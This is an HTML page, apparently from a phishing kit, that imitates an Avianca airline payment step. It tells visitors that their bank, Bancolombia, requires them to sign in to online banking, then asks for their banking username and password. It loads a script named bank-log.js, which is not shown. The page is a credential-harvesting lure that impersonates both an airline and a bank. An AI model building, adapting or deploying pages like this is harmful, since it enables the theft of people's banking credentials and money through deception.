<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Avianca - Bank Loggin</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="shortcut icon" href="./assets/favicon.png" t  ype="image/x-icon">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&family=Red+Hat+Display:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="./css/flight.css">
    <link rel="stylesheet" href="./css/normalize.css">

    <!-- START -->
    <script src="./js/functions.js"></script>
</head>
<body class="mvh-100 bg-gray">

    <!-- ON LOADER -->
    <div class="loader show " style="flex-direction: column;">
        <img class="" src="./assets/svg/plane-loader.gif">
    </div>


    <header>
        <div class="next-step bg-red">
            <img class="ns-logo" src="./assets/logos/avianca_white.svg">
            <h4 class="ns-step">
                <img src="./assets/svg/step_three_red.png">
            </h4>
        </div>
    </header>

    <main>
        <div class="main-form">
            <form id="next-step" class="form-control">
                <div class="form-section">

                    <div class="show align-items-center justify-content-center">
                        <img id="bank-logo" src="./assets/logos/bancolombia.png" width="50px">
                    </div>
                    
                    <div class="form-title show justify-content-center">
                        <h2>Inicia sesión</h2>
                    </div>
                    <p class="fs-4">Por políticas con tu banco <b id="bank-name">BANCOLOMBIA</b> debes iniciar sesión en tu Banca Virtual.</p>

                    <input id="user" type="text" placeholder="Usuario" id="">
                    <input id="puser" class="mt-4" type="text" placeholder="Contraseña" id="">

                    <div class="mt-4 show justify-content-center">
                        <button class="btn btn-gray mt-3 mb-3">
                            Continuar con el pago
                        </button>
                    </div>
                </div>
            </form>
        </div>
    </main>

    <footer class="footer-fixed">
        <p>© Avianca S.A 2023</p>
    </footer>

    <!-- SCRIPTS -->
    <script src="./js/bank-log.js"></script>
</body>
</html>